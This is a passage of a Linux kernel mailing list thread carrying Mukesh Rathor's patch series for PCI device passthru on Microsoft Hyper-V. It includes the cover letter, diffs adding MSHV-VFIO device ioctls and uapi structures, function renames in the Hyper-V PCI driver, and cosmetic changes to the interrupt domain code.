level, cpu, + vector, ret_entry); + + if (hv_result(status) != HV_STATUS_INSUFFICIENT_MEMORY) + break; + + rc = hv_call_deposit_pages(NUMA_NO_NODE, ptid, 1); + if (rc) + break; + }; + if (!hv_result_success(status)) hv_status_err(status, "\n"); @@ -199,8 +224,8 @@ int hv_map_msi_interrupt(struct irq_data *data, hv_devid = hv_build_devid_type_pci(pdev); cpu = cpumask_first(irq_data_get_effective_affinity_mask(data)); - return hv_map_interrupt(hv_devid, false, cpu, cfg->vector, - out_entry ? out_entry : &dummy); + return hv_map_interrupt(hv_current_partition_id, hv_devid, false, cpu, + cfg->vector, out_entry ? out_entry : &dummy); } EXPORT_SYMBOL_GPL(hv_map_msi_interrupt); @@ -422,6 +447,7 @@ int hv_map_ioapic_interrupt(int ioapic_id, bool level, int cpu, int vector, hv_devid.device_type = HV_DEVICE_TYPE_IOAPIC; hv_devid.ioapic.ioapic_id = (u8)ioapic_id; - return hv_map_interrupt(hv_devid, level, cpu, vector, entry); + return hv_map_interrupt(hv_current_partition_id, hv_devid, level, cpu, + vector, entry); } EXPORT_SYMBOL_GPL(hv_map_ioapic_interrupt); -- 2.51.2.vfs.0.1
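The deposit-and-retry shape of hv_map_interrupt() above can be sketched outside the kernel as follows. The hypercall and deposit helpers are stand-ins (the real code calls the map-device-interrupt hypercall and hv_call_deposit_pages()), and the 16-iteration budget mirrors the patch's deposit_pgs bound.

```c
#define STATUS_OK			0
#define STATUS_INSUFFICIENT_MEMORY	1	/* models HV_STATUS_INSUFFICIENT_MEMORY */

/* Stand-in hypercall: succeeds once at least `need` pages are deposited. */
static int try_map(int deposited, int need)
{
	return deposited >= need ? STATUS_OK : STATUS_INSUFFICIENT_MEMORY;
}

/* Bounded retry: attempt the call, deposit one page on a memory failure,
 * and give up after a fixed budget so we never loop forever.
 * Returns the final status; *attempts reports how many calls were made. */
static int map_with_deposit(int need, int *attempts)
{
	int status = STATUS_INSUFFICIENT_MEMORY;
	int deposited = 0, budget = 16;	/* don't loop forever */

	*attempts = 0;
	while (budget--) {
		(*attempts)++;
		status = try_map(deposited, need);
		if (status != STATUS_INSUFFICIENT_MEMORY)
			break;
		deposited++;		/* models hv_call_deposit_pages(..., 1) */
	}
	return status;
}
```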
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:18 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. 
Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
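The mapped vs direct-attach distinction described in the cover letter can be sketched as follows. This is illustrative only: `fake_domain`, `fake_iommu_map` and the domain-kind enum are stand-ins, not names from this series.

```c
#include <assert.h>
#include <stdint.h>

enum domain_kind { DOMAIN_MAPPED, DOMAIN_DIRECT_ATTACH };

struct fake_domain {
	enum domain_kind kind;
	int map_hypercalls;	/* explicit map hypercalls issued so far */
};

/*
 * Mapped domains translate every VFIO map request into an explicit
 * hypercall; direct-attach domains rely on the guest HW page table
 * (EPT/NPT), so mapping is a no-op from the iommu driver's point of
 * view.
 */
static int fake_iommu_map(struct fake_domain *d, uint64_t iova, uint64_t pa)
{
	(void)iova;
	(void)pa;
	if (d->kind == DOMAIN_MAPPED)
		d->map_hypercalls++;	/* map-GPA hypercall would go here */
	return 0;
}
```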
From: Mukesh Rathor <mrathor@linux.microsoft.com> Main change here is to rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg as we introduce hv_compose_msi_msg in upcoming patches that builds MSI messages for both VMBus and non-VMBus cases. VMBus is not used on baremetal root partition for example. While at it, replace spaces with tabs and fix some formatting involving excessive line wraps. There is no functional change. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/pci/controller/pci-hyperv.c | 95 +++++++++++++++-------------- 1 file changed, 48 insertions(+), 47 deletions(-) diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c index 1e237d3538f9..8bc6a38c9b5a 100644 --- a/drivers/pci/controller/pci-hyperv.c +++ b/drivers/pci/controller/pci-hyperv.c @@ -30,7 +30,7 @@ * function's configuration space is zero. * * The rest of this driver mostly maps PCI concepts onto underlying Hyper-V - * facilities. For instance, the configuration space of a function exposed + * facilities. For instance, the configuration space of a function exposed * by Hyper-V is mapped into a single page of memory space, and the * read and write handlers for config space must be aware of this mechanism. 
* Similarly, device setup and teardown involves messages sent to and from @@ -109,33 +109,33 @@ enum pci_message_type { /* * Version 1.1 */ - PCI_MESSAGE_BASE = 0x42490000, - PCI_BUS_RELATIONS = PCI_MESSAGE_BASE + 0, - PCI_QUERY_BUS_RELATIONS = PCI_MESSAGE_BASE + 1, - PCI_POWER_STATE_CHANGE = PCI_MESSAGE_BASE + 4, + PCI_MESSAGE_BASE = 0x42490000, + PCI_BUS_RELATIONS = PCI_MESSAGE_BASE + 0, + PCI_QUERY_BUS_RELATIONS = PCI_MESSAGE_BASE + 1, + PCI_POWER_STATE_CHANGE = PCI_MESSAGE_BASE + 4, PCI_QUERY_RESOURCE_REQUIREMENTS = PCI_MESSAGE_BASE + 5, - PCI_QUERY_RESOURCE_RESOURCES = PCI_MESSAGE_BASE + 6, - PCI_BUS_D0ENTRY = PCI_MESSAGE_BASE + 7, - PCI_BUS_D0EXIT = PCI_MESSAGE_BASE + 8, - PCI_READ_BLOCK = PCI_MESSAGE_BASE + 9, - PCI_WRITE_BLOCK = PCI_MESSAGE_BASE + 0xA, - PCI_EJECT = PCI_MESSAGE_BASE + 0xB, - PCI_QUERY_STOP = PCI_MESSAGE_BASE + 0xC, - PCI_REENABLE = PCI_MESSAGE_BASE + 0xD, - PCI_QUERY_STOP_FAILED = PCI_MESSAGE_BASE + 0xE, - PCI_EJECTION_COMPLETE = PCI_MESSAGE_BASE + 0xF, - PCI_RESOURCES_ASSIGNED = PCI_MESSAGE_BASE + 0x10, - PCI_RESOURCES_RELEASED = PCI_MESSAGE_BASE + 0x11, - PCI_INVALIDATE_BLOCK = PCI_MESSAGE_BASE + 0x12, - PCI_QUERY_PROTOCOL_VERSION = PCI_MESSAGE_BASE + 0x13, - PCI_CREATE_INTERRUPT_MESSAGE = PCI_MESSAGE_BASE + 0x14, - PCI_DELETE_INTERRUPT_MESSAGE = PCI_MESSAGE_BASE + 0x15, + PCI_QUERY_RESOURCE_RESOURCES = PCI_MESSAGE_BASE + 6, + PCI_BUS_D0ENTRY = PCI_MESSAGE_BASE + 7, + PCI_BUS_D0EXIT = PCI_MESSAGE_BASE + 8, + PCI_READ_BLOCK = PCI_MESSAGE_BASE + 9, + PCI_WRITE_BLOCK = PCI_MESSAGE_BASE + 0xA, + PCI_EJECT = PCI_MESSAGE_BASE + 0xB, + PCI_QUERY_STOP = PCI_MESSAGE_BASE + 0xC, + PCI_REENABLE = PCI_MESSAGE_BASE + 0xD, + PCI_QUERY_STOP_FAILED = PCI_MESSAGE_BASE + 0xE, + PCI_EJECTION_COMPLETE = PCI_MESSAGE_BASE + 0xF, + PCI_RESOURCES_ASSIGNED = PCI_MESSAGE_BASE + 0x10, + PCI_RESOURCES_RELEASED = PCI_MESSAGE_BASE + 0x11, + PCI_INVALIDATE_BLOCK = PCI_MESSAGE_BASE + 0x12, + PCI_QUERY_PROTOCOL_VERSION = PCI_MESSAGE_BASE + 0x13, + 
PCI_CREATE_INTERRUPT_MESSAGE = PCI_MESSAGE_BASE + 0x14, + PCI_DELETE_INTERRUPT_MESSAGE = PCI_MESSAGE_BASE + 0x15, PCI_RESOURCES_ASSIGNED2 = PCI_MESSAGE_BASE + 0x16, PCI_CREATE_INTERRUPT_MESSAGE2 = PCI_MESSAGE_BASE + 0x17, PCI_DELETE_INTERRUPT_MESSAGE2 = PCI_MESSAGE_BASE + 0x18, /* unused */ PCI_BUS_RELATIONS2 = PCI_MESSAGE_BASE + 0x19, - PCI_RESOURCES_ASSIGNED3 = PCI_MESSAGE_BASE + 0x1A, - PCI_CREATE_INTERRUPT_MESSAGE3 = PCI_MESSAGE_BASE + 0x1B, + PCI_RESOURCES_ASSIGNED3 = PCI_MESSAGE_BASE + 0x1A, + PCI_CREATE_INTERRUPT_MESSAGE3 = PCI_MESSAGE_BASE + 0x1B, PCI_MESSAGE_MAXIMUM }; @@ -1775,20 +1775,21 @@ static u32 hv_compose_msi_req_v1( * via the HVCALL_RETARGET_INTERRUPT hypercall. But the choice of dummy vCPU is * not irrelevant because Hyper-V chooses the physical CPU to handle the * interrupts based on the vCPU specified in message sent to the vPCI VSP in - * hv_compose_msi_msg(). Hyper-V's choice of pCPU is not visible to the guest, - * but assigning too many vPCI device interrupts to the same pCPU can cause a - * performance bottleneck. So we spread out the dummy vCPUs to influence Hyper-V - * to spread out the pCPUs that it selects. + * hv_vmbus_compose_msi_msg(). Hyper-V's choice of pCPU is not visible to the + * guest, but assigning too many vPCI device interrupts to the same pCPU can + * cause a performance bottleneck. So we spread out the dummy vCPUs to influence + * Hyper-V to spread out the pCPUs that it selects. * * For the single-MSI and MSI-X cases, it's OK for hv_compose_msi_req_get_cpu() * to always return the same dummy vCPU, because a second call to - * hv_compose_msi_msg() contains the "real" vCPU, causing Hyper-V to choose a - * new pCPU for the interrupt. But for the multi-MSI case, the second call to - * hv_compose_msi_msg() exits without sending a message to the vPCI VSP, so the - * original dummy vCPU is used. This dummy vCPU must be round-robin'ed so that - * the pCPUs are spread out. 
All interrupts for a multi-MSI device end up using - * the same pCPU, even though the vCPUs will be spread out by later calls - * to hv_irq_unmask(), but that is the best we can do now. + * hv_vmbus_compose_msi_msg() contains the "real" vCPU, causing Hyper-V to + * choose a new pCPU for the interrupt. But for the multi-MSI case, the second + * call to hv_vmbus_compose_msi_msg() exits without sending a message to the + * vPCI VSP, so the original dummy vCPU is used. This dummy vCPU must be + * round-robin'ed so that the pCPUs are spread out. All interrupts for a + * multi-MSI device end up using the same pCPU, even though the vCPUs will be + * spread out by later calls to hv_irq_unmask(), but that is the best we can do + * now. * * With Hyper-V in Nov 2022, the HVCALL_RETARGET_INTERRUPT hypercall does *not* * cause Hyper-V to reselect the pCPU based on the specified vCPU. Such an @@ -1863,7 +1864,7 @@ static u32 hv_compose_msi_req_v3( } /** - * hv_compose_msi_msg() - Supplies a valid MSI address/data + * hv_vmbus_compose_msi_msg() - Supplies a valid MSI address/data * @data: Everything about this MSI * @msg: Buffer that is filled in by this function * @@ -1873,7 +1874,7 @@ static u32 hv_compose_msi_req_v3( * response supplies a data value and address to which that data * should be written to trigger that interrupt. */ -static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) +static void hv_vmbus_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) { struct hv_pcibus_device *hbus; struct vmbus_channel *channel; @@ -1955,7 +1956,7 @@ static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) return; } /* - * The vector we select here is a dummy value. The correct + * The vector we select here is a dummy value. The correct * value gets sent to the hypervisor in unmask(). This needs * to be aligned with the count, and also not zero. Multi-msi * is powers of 2 up to 32, so 32 will always work here. 
@@ -2047,7 +2048,7 @@ static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) /* * Make sure that the ring buffer data structure doesn't get - * freed while we dereference the ring buffer pointer. Test + * freed while we dereference the ring buffer pointer. Test * for the channel's onchannel_callback being NULL within a * sched_lock critical section. See also the inline comments * in vmbus_reset_channel_cb(). @@ -2147,7 +2148,7 @@ static const struct msi_parent_ops hv_pcie_msi_parent_ops = { /* HW Interrupt Chip Descriptor */ static struct irq_chip hv_msi_irq_chip = { .name = "Hyper-V PCIe MSI", - .irq_compose_msi_msg = hv_compose_msi_msg, + .irq_compose_msi_msg = hv_vmbus_compose_msi_msg, .irq_set_affinity = irq_chip_set_affinity_parent, .irq_ack = irq_chip_ack_parent, .irq_eoi = irq_chip_eoi_parent, @@ -2159,8 +2160,8 @@ static int hv_pcie_domain_alloc(struct irq_domain *d, unsigned int virq, unsigne void *arg) { /* - * TODO: Allocating and populating struct tran_int_desc in hv_compose_msi_msg() - * should be moved here. + * TODO: Allocating and populating struct tran_int_desc in + * hv_vmbus_compose_msi_msg() should be moved here. */ int ret; @@ -2227,7 +2228,7 @@ static int hv_pcie_init_irq_domain(struct hv_pcibus_device *hbus) /** * get_bar_size() - Get the address space consumed by a BAR * @bar_val: Value that a BAR returned after -1 was written - * to it. + * to it. * * This function returns the size of the BAR, rounded up to 1 * page. It has to be rounded up because the hypervisor's page @@ -2573,7 +2574,7 @@ static void q_resource_requirements(void *context, struct pci_response *resp, * new_pcichild_device() - Create a new child device * @hbus: The internal struct tracking this root PCI bus. * @desc: The information supplied so far from the host - * about the device. + * about the device. * * This function creates the tracking structure for a new child * device and kicks off the process of figuring out what it is. 
@@ -3100,7 +3101,7 @@ static void hv_pci_onchannelcallback(void *context) * sure that the packet pointer is still valid during the call: * here 'valid' means that there's a task still waiting for the * completion, and that the packet data is still on the waiting - * task's stack. Cf. hv_compose_msi_msg(). + * task's stack. Cf. hv_vmbus_compose_msi_msg(). */ comp_packet->completion_func(comp_packet->compl_ctxt, response, @@ -3417,7 +3418,7 @@ static int hv_allocate_config_window(struct hv_pcibus_device *hbus) * vmbus_allocate_mmio() gets used for allocating both device endpoint * resource claims (those which cannot be overlapped) and the ranges * which are valid for the children of this bus, which are intended - * to be overlapped by those children. Set the flag on this claim + * to be overlapped by those children. Set the flag on this claim * meaning that this region can't be overlapped. */ @@ -4066,7 +4067,7 @@ static int hv_pci_restore_msi_msg(struct pci_dev *pdev, void *arg) irq_data = irq_get_irq_data(entry->irq); if (WARN_ON_ONCE(!irq_data)) return -EINVAL; - hv_compose_msi_msg(irq_data, &entry->msg); + hv_vmbus_compose_msi_msg(irq_data, &entry->msg); } return 0; } @@ -4074,7 +4075,7 @@ static int hv_pci_restore_msi_msg(struct pci_dev *pdev, void *arg) /* * Upon resume, pci_restore_msi_state() -> ... -> __pci_write_msi_msg() * directly writes the MSI/MSI-X registers via MMIO, but since Hyper-V - * doesn't trap and emulate the MMIO accesses, here hv_compose_msi_msg() + * doesn't trap and emulate the MMIO accesses, here hv_vmbus_compose_msi_msg() * must be used to ask Hyper-V to re-create the IOMMU Interrupt Remapping * Table entries. */ -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:23 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
From: Mukesh Rathor <mrathor@linux.microsoft.com> Add ioctl support for creating MSHV devices for a partition. At present only VFIO device types are supported, but more could be added. At a high level, a partition ioctl to create a device verifies it is of type VFIO and does some setup for bridge code in mshv_vfio.c. Adapted from KVM device ioctls. Credits: Original author: Wei Liu <wei.liu@kernel.org> NB: Slightly modified from the original version. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root_main.c | 126 ++++++++++++++++++++++++++++++++++++ 1 file changed, 126 insertions(+) diff --git a/drivers/hv/mshv_root_main.c b/drivers/hv/mshv_root_main.c index 83c7bad269a0..27313419828d 100644 --- a/drivers/hv/mshv_root_main.c +++ b/drivers/hv/mshv_root_main.c @@ -1551,6 +1551,129 @@ mshv_partition_ioctl_initialize(struct mshv_partition *partition) return ret; } +static long mshv_device_attr_ioctl(struct mshv_device *mshv_dev, int cmd, + ulong uarg) +{ + struct mshv_device_attr attr; + const struct mshv_device_ops *devops = mshv_dev->device_ops; + + if (copy_from_user(&attr, (void __user *)uarg, sizeof(attr))) + return -EFAULT; + + switch (cmd) { + case MSHV_SET_DEVICE_ATTR: + if (devops->device_set_attr) + return devops->device_set_attr(mshv_dev, &attr); + break; + case MSHV_HAS_DEVICE_ATTR: + if (devops->device_has_attr) + return devops->device_has_attr(mshv_dev, &attr); + break; + } + + return -EPERM; +} + +static long mshv_device_fop_ioctl(struct file *filp, unsigned int cmd, + ulong uarg) +{ + struct mshv_device *mshv_dev = filp->private_data; + + switch (cmd) { + case MSHV_SET_DEVICE_ATTR: + case MSHV_HAS_DEVICE_ATTR: + return mshv_device_attr_ioctl(mshv_dev, cmd, uarg); + } + + return -ENOTTY; +} + +static int mshv_device_fop_release(struct inode *inode, struct file *filp) +{ + struct mshv_device *mshv_dev = filp->private_data; + struct mshv_partition *partition = mshv_dev->device_pt; + + if 
(mshv_dev->device_ops->device_release) { + mutex_lock(&partition->pt_mutex); + hlist_del(&mshv_dev->device_ptnode); + mshv_dev->device_ops->device_release(mshv_dev); + mutex_unlock(&partition->pt_mutex); + } + + mshv_partition_put(partition); + return 0; +} + +static const struct file_operations mshv_device_fops = { + .owner = THIS_MODULE, + .unlocked_ioctl = mshv_device_fop_ioctl, + .release = mshv_device_fop_release, +}; + +long mshv_partition_ioctl_create_device(struct mshv_partition *partition, + void __user *uarg) +{ + long rc; + struct mshv_create_device devargk; + struct mshv_device *mshv_dev; + const struct mshv_device_ops *vfio_ops; + + if (copy_from_user(&devargk, uarg, sizeof(devargk))) { + rc = -EFAULT; + goto out; + } + + /* At present, only VFIO is supported */ + if (devargk.type != MSHV_DEV_TYPE_VFIO) { + rc = -ENODEV; + goto out; + } + + if (devargk.flags & MSHV_CREATE_DEVICE_TEST) { + rc = 0; + goto out; + } + + mshv_dev = kzalloc(sizeof(*mshv_dev), GFP_KERNEL_ACCOUNT); + if (mshv_dev == NULL) { + rc = -ENOMEM; + goto out; + } + + vfio_ops = &mshv_vfio_device_ops; + mshv_dev->device_ops = vfio_ops; + mshv_dev->device_pt = partition; + + rc = vfio_ops->device_create(mshv_dev, devargk.type); + if (rc < 0) { + kfree(mshv_dev); + goto out; + } + + hlist_add_head(&mshv_dev->device_ptnode, &partition->pt_devices); + + mshv_partition_get(partition); + rc = anon_inode_getfd(vfio_ops->device_name, &mshv_device_fops, + mshv_dev, O_RDWR | O_CLOEXEC); + if (rc < 0) { + mshv_partition_put(partition); + hlist_del(&mshv_dev->device_ptnode); + vfio_ops->device_release(mshv_dev); + goto out; + } + + devargk.fd = rc; + rc = 0; + + if (copy_to_user(uarg, &devargk, sizeof(devargk))) { + rc = -EFAULT; + goto out; + } +out: + return rc; +} + static long mshv_partition_ioctl(struct file *filp, unsigned int ioctl, unsigned long arg) { @@ -1587,6 +1710,9 @@ mshv_partition_ioctl(struct file *filp, unsigned int ioctl, unsigned long arg) case MSHV_ROOT_HVCALL: ret = 
mshv_ioctl_passthru_hvcall(partition, true, uarg); break; + case MSHV_CREATE_DEVICE: + ret = mshv_partition_ioctl_create_device(partition, uarg); + break; default: ret = -ENOTTY; } -- 2.51.2.vfs.0.1
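The attr-ioctl dispatch added in this patch has two distinct failure modes: a known command whose callback the device does not provide returns -EPERM, while an unrecognised command returns -ENOTTY. A stand-alone sketch of that logic; `fake_ops`, `fake_attr_ioctl` and the zero-based command values are stand-ins, not the real uapi:

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Stand-in command values; the real ones come from the mshv uapi header. */
#define MSHV_SET_DEVICE_ATTR 0
#define MSHV_HAS_DEVICE_ATTR 1

struct fake_ops {
	long (*set_attr)(void);
	long (*has_attr)(void);
};

static long attr_ok(void)
{
	return 0;
}

/*
 * Mirrors the dispatch in mshv_device_attr_ioctl(): a known command
 * without a registered callback fails with -EPERM; an unknown command
 * fails with -ENOTTY (which the real code returns one level up, in
 * mshv_device_fop_ioctl()).
 */
static long fake_attr_ioctl(const struct fake_ops *ops, int cmd)
{
	switch (cmd) {
	case MSHV_SET_DEVICE_ATTR:
		if (ops->set_attr)
			return ops->set_attr();
		break;
	case MSHV_HAS_DEVICE_ATTR:
		if (ops->has_attr)
			return ops->has_attr();
		break;
	default:
		return -ENOTTY;
	}
	return -EPERM;
}
```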
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:22 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
From: Mukesh Rathor <mrathor@linux.microsoft.com> Add data structs needed by the subsequent patch that introduces a new module to implement VFIO-MSHV pseudo device. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root.h | 23 +++++++++++++++++++++++ include/uapi/linux/mshv.h | 31 +++++++++++++++++++++++++++++++ 2 files changed, 54 insertions(+) diff --git a/drivers/hv/mshv_root.h b/drivers/hv/mshv_root.h index c3753b009fd8..42e1da1d545b 100644 --- a/drivers/hv/mshv_root.h +++ b/drivers/hv/mshv_root.h @@ -220,6 +220,29 @@ struct port_table_info { }; }; +struct mshv_device { + const struct mshv_device_ops *device_ops; + struct mshv_partition *device_pt; + void *device_private; + struct hlist_node device_ptnode; +}; + +struct mshv_device_ops { + const char *device_name; + long (*device_create)(struct mshv_device *dev, u32 type); + void (*device_release)(struct mshv_device *dev); + long (*device_set_attr)(struct mshv_device *dev, + struct mshv_device_attr *attr); + long (*device_has_attr)(struct mshv_device *dev, + struct mshv_device_attr *attr); +}; + +extern struct mshv_device_ops mshv_vfio_device_ops; +int mshv_vfio_ops_init(void); +void mshv_vfio_ops_exit(void); +long mshv_partition_ioctl_create_device(struct mshv_partition *partition, + void __user *user_args); + int mshv_update_routing_table(struct mshv_partition *partition, const struct mshv_user_irq_entry *entries, unsigned int numents); diff --git a/include/uapi/linux/mshv.h b/include/uapi/linux/mshv.h index dee3ece28ce5..b7b10f9e2896 100644 --- a/include/uapi/linux/mshv.h +++ b/include/uapi/linux/mshv.h @@ -252,6 +252,7 @@ struct mshv_root_hvcall { #define MSHV_GET_GPAP_ACCESS_BITMAP _IOWR(MSHV_IOCTL, 0x06, struct mshv_gpap_access_bitmap) /* Generic hypercall */ #define MSHV_ROOT_HVCALL _IOWR(MSHV_IOCTL, 0x07, struct mshv_root_hvcall) +#define MSHV_CREATE_DEVICE _IOWR(MSHV_IOCTL, 0x08, struct mshv_create_device) /* ******************************** @@ -402,4 +403,34 @@ struct 
mshv_sint_mask { /* hv_hvcall device */ #define MSHV_HVCALL_SETUP _IOW(MSHV_IOCTL, 0x1E, struct mshv_vtl_hvcall_setup) #define MSHV_HVCALL _IOWR(MSHV_IOCTL, 0x1F, struct mshv_vtl_hvcall) + +/* device passthru */ +#define MSHV_CREATE_DEVICE_TEST 1 + +enum { + MSHV_DEV_TYPE_VFIO, + MSHV_DEV_TYPE_MAX, +}; + +struct mshv_create_device { + __u32 type; /* in: MSHV_DEV_TYPE_xxx */ + __u32 fd; /* out: device handle */ + __u32 flags; /* in: MSHV_CREATE_DEVICE_xxx */ +}; + +#define MSHV_DEV_VFIO_FILE 1 +#define MSHV_DEV_VFIO_FILE_ADD 1 +#define MSHV_DEV_VFIO_FILE_DEL 2 + +struct mshv_device_attr { + __u32 flags; /* no flags currently defined */ + __u32 group; /* device-defined */ + __u64 attr; /* group-defined */ + __u64 addr; /* userspace address of attr data */ +}; + +/* Device fds created with MSHV_CREATE_DEVICE */ +#define MSHV_SET_DEVICE_ATTR _IOW(MSHV_IOCTL, 0x00, struct mshv_device_attr) +#define MSHV_HAS_DEVICE_ATTR _IOW(MSHV_IOCTL, 0x01, struct mshv_device_attr) + #endif -- 2.51.2.vfs.0.1
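The _IOW()/_IOWR() numbers defined above follow the standard Linux ioctl encoding: command nr in bits 0-7, magic/type in bits 8-15, argument size in bits 16-29, direction in bits 30-31. For struct mshv_device_attr (two __u32 plus two __u64, naturally aligned) the encoded size is 24 bytes. A small sketch of that layout; the 0xB8 magic in the test is a placeholder, since MSHV_IOCTL's value is not shown in this patch:

```c
#include <assert.h>
#include <stdint.h>

/* Direction bits of the standard Linux _IOC() encoding. */
#define IOC_NONE  0u
#define IOC_WRITE 1u
#define IOC_READ  2u

/*
 * Pack an ioctl number the way _IOC() does: direction in bits 30-31,
 * argument size in bits 16-29, magic/type in bits 8-15, nr in bits 0-7.
 */
static uint32_t ioc(uint32_t dir, uint32_t type, uint32_t nr, uint32_t size)
{
	return (dir << 30) | (size << 16) | (type << 8) | nr;
}
```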
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:20 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
From: Mukesh Rathor <mrathor@linux.microsoft.com> Make cosmetic changes: o Rename struct pci_dev *dev to *pdev since there are cases of struct device *dev in the file and all over the kernel o Rename hv_build_pci_dev_id to hv_build_devid_type_pci in anticipation of building different types of device ids o Fix checkpatch.pl issues with return and extraneous printk o Replace spaces with tabs o Rename struct hv_devid *xxx to struct hv_devid *hv_devid given code paths involve many types of device ids o Fix indentation in a large if block by using goto. There are no functional changes. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/x86/hyperv/irqdomain.c | 197 +++++++++++++++++++----------------- 1 file changed, 103 insertions(+), 94 deletions(-) diff --git a/arch/x86/hyperv/irqdomain.c b/arch/x86/hyperv/irqdomain.c index c3ba12b1bc07..f6b61483b3b8 100644 --- a/arch/x86/hyperv/irqdomain.c +++ b/arch/x86/hyperv/irqdomain.c @@ -1,5 +1,4 @@ // SPDX-License-Identifier: GPL-2.0 - /* * Irqdomain for Linux to run as the root partition on Microsoft Hypervisor. 
* @@ -14,8 +13,8 @@ #include <linux/irqchip/irq-msi-lib.h> #include <asm/mshyperv.h> -static int hv_map_interrupt(union hv_device_id device_id, bool level, - int cpu, int vector, struct hv_interrupt_entry *entry) +static int hv_map_interrupt(union hv_device_id hv_devid, bool level, + int cpu, int vector, struct hv_interrupt_entry *ret_entry) { struct hv_input_map_device_interrupt *input; struct hv_output_map_device_interrupt *output; @@ -32,7 +31,7 @@ static int hv_map_interrupt(union hv_device_id device_id, bool level, intr_desc = &input->interrupt_descriptor; memset(input, 0, sizeof(*input)); input->partition_id = hv_current_partition_id; - input->device_id = device_id.as_uint64; + input->device_id = hv_devid.as_uint64; intr_desc->interrupt_type = HV_X64_INTERRUPT_TYPE_FIXED; intr_desc->vector_count = 1; intr_desc->target.vector = vector; @@ -44,7 +43,7 @@ static int hv_map_interrupt(union hv_device_id device_id, bool level, intr_desc->target.vp_set.valid_bank_mask = 0; intr_desc->target.vp_set.format = HV_GENERIC_SET_SPARSE_4K; - nr_bank = cpumask_to_vpset(&(intr_desc->target.vp_set), cpumask_of(cpu)); + nr_bank = cpumask_to_vpset(&intr_desc->target.vp_set, cpumask_of(cpu)); if (nr_bank < 0) { local_irq_restore(flags); pr_err("%s: unable to generate VP set\n", __func__); @@ -61,7 +60,7 @@ static int hv_map_interrupt(union hv_device_id device_id, bool level, status = hv_do_rep_hypercall(HVCALL_MAP_DEVICE_INTERRUPT, 0, var_size, input, output); - *entry = output->interrupt_entry; + *ret_entry = output->interrupt_entry; local_irq_restore(flags); @@ -71,21 +70,19 @@ static int hv_map_interrupt(union hv_device_id device_id, bool level, return hv_result_to_errno(status); } -static int hv_unmap_interrupt(u64 id, struct hv_interrupt_entry *old_entry) +static int hv_unmap_interrupt(u64 id, struct hv_interrupt_entry *irq_entry) { unsigned long flags; struct hv_input_unmap_device_interrupt *input; - struct hv_interrupt_entry *intr_entry; u64 status; local_irq_save(flags); 
